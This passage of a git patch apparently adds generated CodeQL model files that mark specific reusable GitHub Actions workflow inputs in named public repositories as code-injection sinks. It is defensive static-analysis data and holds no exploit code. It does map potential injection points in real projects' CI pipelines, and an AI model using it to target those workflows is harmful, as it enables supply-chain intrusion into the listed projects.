ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml new file mode 100644 index 00000000000..2e8a6683a57 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "inputs.scenario", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml new file mode 100644 index 00000000000..55533f12312 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["8vim/8vim/.github/workflows/publish.yaml", "*", "inputs.version_code", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/publish.yaml", "*", "inputs.version_name", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/bump-version.yaml", "*", "inputs.message", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/build.yaml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml new file mode 100644 index 00000000000..a14d41a15b9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.base-pr-branch", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.head-pr-branch", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.reference-files", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.target-folder", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/codeql-analysis.yml", "*", "inputs.build-command", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/check-dist.yml", "*", "inputs.dist-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml new file mode 100644 index 00000000000..0888318ad93 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.namespace-repository", "code-injection", "generated"] + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.file-dir", "code-injection", "generated"] + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.build-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml new file mode 100644 index 00000000000..6ea6dcdab70 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "inputs.wheel-tags-to-skip", "code-injection", "generated"] + - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "inputs.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml new file mode 100644 index 00000000000..2c18a166cc1 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "inputs.wheel-tags-to-skip", "code-injection", "generated"] + - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "inputs.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml new file mode 100644 index 00000000000..f065947dbdc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "inputs.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml new file mode 100644 index 00000000000..438525e77e2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml new file mode 100644 index 00000000000..ca3111ad03a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml new file mode 100644 index 00000000000..1e09e05e8b6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml new file mode 100644 index 00000000000..ad061ca714d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.module", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.jdk", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.sql_compatibility", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.override_config_path", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.testing_groups", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.use_indexer", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.runtime_jdk", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.it", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.script", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.build_jdk", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml new file mode 100644 index 00000000000..3a721a0f2cf --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "inputs.environment", "code-injection", "generated"] + - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "inputs.workflow-caller-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml new file mode 100644 index 00000000000..bdabbb9ab60 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/spark/.github/workflows/build_and_test.yml", "*", "inputs.branch", "code-injection", "generated"] + - ["apache/spark/.github/workflows/build_and_test.yml", "*", "inputs.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml new file mode 100644 index 00000000000..6d8438462a8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "inputs.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml new file mode 100644 index 00000000000..6d7bf7af0c2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.docker_image_name", "code-injection", "generated"] + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.ghcr_image_name", "code-injection", "generated"] + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.quay_image_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml new file mode 100644 index 00000000000..b3b198fbf65 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.docker_image_name", "code-injection", "generated"] + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.ghcr_image_name", "code-injection", "generated"] + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.quay_image_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml new file mode 100644 index 00000000000..9c3ae9bf194 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "inputs.dist-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml new file mode 100644 index 00000000000..68a85006c6c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "inputs.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml new file mode 100644 index 00000000000..ee336ee076c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "inputs.terraform_workingdir", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.parameters-file", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.workspace_name", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.resource_group", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.dockerfile-location", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.environment_file", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.workspace_name", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.resource_group", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml new file mode 100644 index 00000000000..3d3f727923a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-email", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-name", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.track", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml new file mode 100644 index 00000000000..f18d1e4c50a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-email", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-name", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.track", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml new file mode 100644 index 00000000000..21db2585a5e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "inputs.shell", "code-injection", "generated"] + - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "inputs.environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml new file mode 100644 index 00000000000..3f263608c21 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git 